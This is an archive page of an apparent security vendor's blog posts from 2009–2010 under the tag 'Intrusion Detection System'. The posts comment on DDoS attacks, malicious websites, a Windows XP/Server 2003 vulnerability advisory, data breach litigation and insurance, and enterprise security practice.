Many of you might remember the distributed denial of service (DDOS) attacks that hampered several US websites about a year ago. The source of the attacks appeared to come from North Korea. Now, the US says that there is no conclusive evidence that the attacks came from North Korea at all. This is very common. A good hacker will attack a system from a non-friendly nation state. In other words if you want to attack the U.S., use a North Korea computer to do it because there is little if any cooperation in working to identify the culprit. Of course the computer in North Korea would be controlled by one in the U.K. which would be controlled by one in Iran, etc. These are the standard tactics experienced hackers use to keep from getting caught. In this particular DDOS attack case they say that it is very unlikely that the culprit will ever be found.
Posts Tagged ‘Intrusion Detection System’
Malicious websites continue to be hackers’ weapon of choice
Wednesday, July 7th, 2010For a couple of years now I have been explaining how the weapon of choice for hackers is to use malicious websites. It is exponentially easier for them to exploit systems and these methods completely bypass traditional network firewall and intrusion detection and prevention systems. Take for example, the series of attacks that were reported June 9, 2010. Tens of thousands of webpages were found to be infected with malware. So the hackers discovered a vulnerability in Microsoft IIS that they could exploit in an automated way. They then infected the website to redirect visitors to malicious servers where malware is installed to the users desktop. A redirection is very easy to do and takes only a single line of code. There were more than 100,000 web pages that were compromised in this attack alone. These aren’t just unknown sites either, it includes The Wall Street Journal and many other sites that many of your users access every day. Organizations need to think beyond the network-based intrusion detection system if they really want to protect their networks.
Insurer claims non-liability in $3.3M data breach in Utah
Thursday, June 17th, 2010My wife’s personal information was among those in the 1.7 million record data breach of a local hospital in Utah. In this case, backup tapes were stolen and later recovered and appeared to have not been used. The hospital made a claim to the 3rd party provider, Perpetual Storage, who made the mistake allowing the tapes to be stolen. The claim is for $3.3 million dollars, which the hospital said they had to pay in breach notification, credit monitoring, and other fees and costs associated with the breach. Perpetual Storage had an insurance policy with Colorado Casualty Insurance Co. for information security breaches. Colorado Casualty Insurance is saying that they are not liable and don’t have to pay. This is actually more common than you would think. Just because you have an insurance provider, doesn’t mean that it’s is a good risk mitigation strategy. Research these companies carefully. Find out what policies they have paid out and which ones they haven’t. Read the fine print. You could be paying for a policy that doesn’t help you when you really need it.
Security Alert for Windows XP and Server 2003 Users
Tuesday, June 15th, 2010Perimeter E-Security customers should be aware of a Microsoft Windows XP and Server 2003 exploit. Exploit code has been posted online that shows attackers exactly how to compromise Windows XP and Server 2003 operating systems remotely. This is possible due to a newly discovered security flaw in the way Windows Help and Support Center process links. These systems are supposed to work based on a fixed “whitelist” (a list of approved and authorized URLs), however a security researcher at Google has shown how cyber criminals can add URLs to that whitelist. As a result, an attacker could trick a user into following a link which could download any file the hacker would like. The link and downloaded files can use the same permissions as the systems current user. Many systems are configured by default with the user having administrative privileges.
Microsoft said “Given the public disclosure of the details of the vulnerability, and how to exploit it, customers should be aware that broad attacks are likely,” this includes worms and a host of other malware that can automatically exploit this code through a variety of methods.
This is worse than most vulnerabilities we see. Most vulnerabilities allow the system to be compromised in a specific way that may allow limited access or flexibility to the hacker. This vulnerability makes it very easy for the cyber criminal to install any software they want as if they are the system administrator.
The solution?
- There is no automated fix from Microsoft at this time. However, there is a manual ”work around.”
The manual “work around” involves editing the Registry. Note – only experienced system administrators should manually edit the registry. One wrong move can cause major stability and bootup problems. The details for the registry edit can be found in the Microsoft Security Advisory (2219475).
Beware that Microsoft says that this may break links that you are trying to use in the Help and Support Center. Microsoft has also posted a knowledge base article with a “fixit” here.
- Stay tuned for more details from Microsoft
Microsoft is working on a patch. The Google researcher who discovered the flaw has released a fix; however, Microsoft says that this fix is easily bypassed and that users should not rely on the Google fix to resolve the problem.
While Microsoft is working on a patch, Perimeter E-Security continues to encourage users (especially those using XP) to create a limited user account for everyday computing. Read more on this here. This will go a long way to protect systems from this exploit as well as many others we have seen in the past and will likely see in the future.
Contact us today at 800.234.2175 to talk with a security expert if you have further questions.
Tags: Windows XP exploit, Server 2003 exploit, vulnerability assessment tools, IT security, application penetration testing, managed service providers, intrusion detection system, security penetration testing
Federal Court Absolves a Firm That Exposed Social Security Numbers
Tuesday, June 15th, 2010I was really glad to see this article: http://www.theregister.co.uk/2010/06/04/privacy_suit_absolution/
Lawsuits, as a result of data breaches, were out of control. Sure, if a company has a breach that results in fraud or identity theft, I can understand why someone would want to sue the company. I believe that if a breach occurs, and it is at all possible that identity theft or fraud might occur as a result, that the company should offer credit monitoring services for people. But what I have never agreed with are those suits filed by individuals or groups where no identity theft has occurred, no fraud occurred, and there is little or no chance of having that happen and still, they get sued. The Ninth US Circuit Court of Appeals has ruled that a man whose personal information, including his social security number, was exposed has no legal standing to seek damages BECAUSE HE DID NOT SUFFER MATERIALLY AS A RESULT OF THE BREACH. This is how it should be. I remember the class-action lawsuit against the Veterans Affairs where they had to pay $20 million and no identity theft or fraud had occurred. There were 26.5 million records exposed, so was everyone going to get $0.50 after the attorneys were paid. These lawsuits have been ambulance-chasing lawyer’s dreams for some time. I am glad it is moving in another direction…
Thieves Flood Victim’s Phone with Calls to Loot Bank Accounts
Wednesday, May 19th, 2010We often talk about the multipronged attacks that hackers use. There is a new one that I saw recently that I thought was kind of interesting. Criminals are clogging the telephone lines of financial institutions at the time they are attempting to initiate transactions. Combining a denial of service (DOS) attack with their transaction offers the cyber thieves some advantages. For transactions that would normally initiate a call to the individual for verification, that outbound call is not blocked or otherwise disrupted. Additionally, the fraudsters can call and complain that they have been having telephone problems which may change an employee’s behavior to not follow strict policies and procedures. If nothing else, this is something financial institutions should be aware of.
Answering Enterprise Security Questions
Monday, April 5th, 2010
I was asked to answer some specific questions for a reporter of Processor Magazine. They usually take bits and pieces of what I send combined with others in the industry to write their articles. So I thought I would list the questions here and my full answers. At some point we will see what they use of these…
—————————
What does it take to keep the enterprise secure?
A lot more than people think. The idea that a firewall and anti-virus software are enough can only be described as reckless these days. Even intrusion detection and prevention systems can be easily bypassed by cyber criminals. Every organization is different and therefore there isn’t one answer that will keep all enterprises secure; but in general a layered security approach that includes information security defenses at the edge, in the core of the network, and on the endpoints is what is needed.
More importantly than the technologies or solutions employed is the way in which the enterprise will get the most out of those solutions. Centralized reporting and administration is key. Central repositories for compliance documents and audit documentation is critical. Policies, procedures and controls are paramount. The best thing an enterprise can do is work with a security expert that has their best interest in mind and help them design and roll out a comprehensive security program that fits their requirements and budget.
Why should some applications (or classes of apps) NOT be used in the enterprise?
The term “applications” is so broad it is tough to answer this. In general, there are lots of applications that shouldn’t be used in an enterprise or closely managed and monitored if they are used. Some for productivity reasons. Others for security reasons. In my mind, what is more important than broadly banning applications (although there are times you should do that) is ensuring that systems only have the applications they need to perform their various functions. Any application can have vulnerabilities that can be exploited. Look at Adobe Acrobat for example. It is on more systems than any other application on the planet and has one of the highest rates of known, critical vulnerabilities. I don’t know of many enterprises that are going to ban Adobe Acrobat. So the more important thing is a process whereby you can patch the systems and keep them up to date to reduce the chance of compromise.
If you are referring to “applications” in the context of security solutions then I would answer differently. Simply stated, every organization is unique and information security must be implemented and somewhat customized for that particular organization to offer real value.
Why should others be used? Do you have any examples?
Again, if we are talking about security applications, one that I feel is really necessary these days but often not known or used is Host Based Intrusion Detection & Prevention (HIPS). This is software that goes right on the endpoints you want to protect. It does a great job with securing individual assets you want to protect at a higher level such as mission critical systems, customer databases, active directory services, or Internet accessible devices like an email server or web server. Web Content Filtering is another one that is absolutely necessary to help keep malware out of your organization. From a security standpoint, there are so many solutions an enterprise really needs to work with an expert to see what they need.
Why isn’t it the best idea to give end-users administrator rights?
There are lots of reasons for this 1) the user may install software that could compromise the system and subsequently the entire network. 2) Hackers that compromise the system may use these rights for other nefarious purposes.
How is mobility affecting the typical company’s security planning?
USB thumb drives, smart phones, iPods/iPhones, and other devices are causing major problems for enterprises. Malicious insiders can use these devices to steal massive amounts of information and walk out with it on their keychain or in their pocket. Careless and untrained insiders often spread malware, viruses, Trojans, worms and other things that can compromise or destroy systems and data. Mobile users such as telecommuters and travelers often have laptops stolen which have sensitive data on them. 45 of the 50 states have data breach disclosure laws that require an enterprise to publicly announce these incidents which can have a huge impact on revenue, customer retention, and stock prices, not to mention the fees and class action lawsuits that usually follow.
Is there such thing as too much or too little security?
Of course there is such a thing as too little security. I also believe that there can be too much security. If you have so many security solutions and technology that you aren’t able to keep up with the 24×7 management and monitoring, you aren’t getting what you need out of those solutions. You are wasting money. In the hands of properly qualified information security experts, it would be better. But there are so many solutions that people have deployed and they simply aren’t getting much value from them. Maybe they were at one time, but people keep adding solution after solution and technology after technology rather than doing a risk and gap analysis and finding out what they really need and then simply using those things. They will find they spend less in the end and get much better risk mitigation.
Is the Chinese Government Really Trying to Stop Cybercrime?
Monday, February 15th, 2010
The Chinese police have arrested 3 in conjunction with a hacker site called Black Hawk. This site had been (among other things) selling membership fees totaling more than $1 million US. This group has been known to threaten businesses such as Internet cafés telling them they would be shut down with a DDOS attack if they didn’t pay them. Ultimately the Chinese authorities found them by tracking the phone number given to these businesses to pay Black Hawk.
What is really happening here is that the Chinese government feels the pressure as a result of the Google hacks and wants to appear like they are really cracking down on cybercrime. The truth is, these bozos at Black Hawk aren’t anywhere near the level of sophistication as the Google hacks (which many believe were in face Chinese state sponsored). So this really is nothing more than perception management by the Chinese, which likely means they are feeling a bit of pressure but ultimately have no intention of changing their behavior at the government level.
SPAM Alert: Healthcare Reform Emails Include Malicious Software Download
Tuesday, September 22nd, 2009Are you passionate about the current healthcare debate in the U.S.? If so, you may be willing to follow the instructions millions are getting in their email box. The SPAM email encourages people to download software they are told will launch a distributed denial of service (DDOS) attack against the White House. It is unclear if the software actually launches the DDOS attack, but is clear that the software is malicious in nature and has rootkit like attributes. While most SPAM and AV filters are catching this, it is still important to be careful!
Government Sponsored DDOS
Thursday, July 9th, 2009According to an article by the Associated Press, North Korea may be behind a series of distributed denial of service (DDOS) attack that began on July 4 against several government, news, and other agencies. The U.S. government at this time is not discussing the attacks. It also was not clear the extent of the attack. In other words, we don’t know if the sites were completely taken offline, or just saturated through attack requests. A more recent article talks about which agencies were able to fend off the attacks well, while others struggled during the holiday weekend.
While many elements of security is moving towards the desktop, things like DDOS attacks can only be stopped at the service provider level, or by large sophisticated enterprises. Service providers are beginning to prepare themselves better for these types of attacks that most security experts expect to increase dramatically in the future.
Government sponsored DDOS attacks… in other words government sponsored cyber terrorism seems to becoming more common as well. There have been a few examples in the past. One of the more recent is the attacks against Estonia by (what is believe by most to be) the Russian government. Cyber terrorism will be a powerful weapon of the future.
DDOS Attack Against Domain Register DNS
Tuesday, June 9th, 2009In a previous post, I mentioned how botnets have grown in size and sophistication that we should gear up for some real attacks coming from them. I think we will begin to see more attacks like the one that happened a couple of weeks ago in China. A DDOS attack against a popular domain registrer in China. The DDOS attack was specifically against the domain name servers (DNS). The DNS servers resolve the friendly name like www.mydomain.com to the numbered IP address that is assigned to the web server. When a system like this comes under attack, it makes it so other cannot get to the system, and therefore cannot resolve the name. Effectively this blocks their access to the site…even though the site itself wasn’t attacked. As time goes on and with the continual growth of botnets, we will see more attacks like this.
41 Percent of Software on PCs Worldwide is Pirated
Friday, May 29th, 2009The Business Software Alliance (BSA) recently released statistics that says the 2008 percentage of pirated software grew from 38 percent in 2007 to 41 percent in 2008. The US has a low percentage compared to most nations.
In my opinion, this isn’t about economic and revenue losses, but rather a security issue. Most pirated versions of software cannot receive updates and patches. This leaves a lot of vulnerable systems to be attacked, exploited, and then used for nefarious purposes.
Vint Cerf estimated that one in four computers worldwide has command and control software that makes it part of a botnet. Of course no one knows the real figure. Most other security professionals estimate it somewhere between one percent and 10 percent. Either way, it is a big number. Having that many systems under the control of others can have devastating consequences. This is why we have the volume of SPAM we have today. This is how countries can (and have) been taken offline through DDOS attacks. The problem with pirated software is that those systems become a plague to all the legitimate systems out there. This will grow to be an enormous problem in the near future.
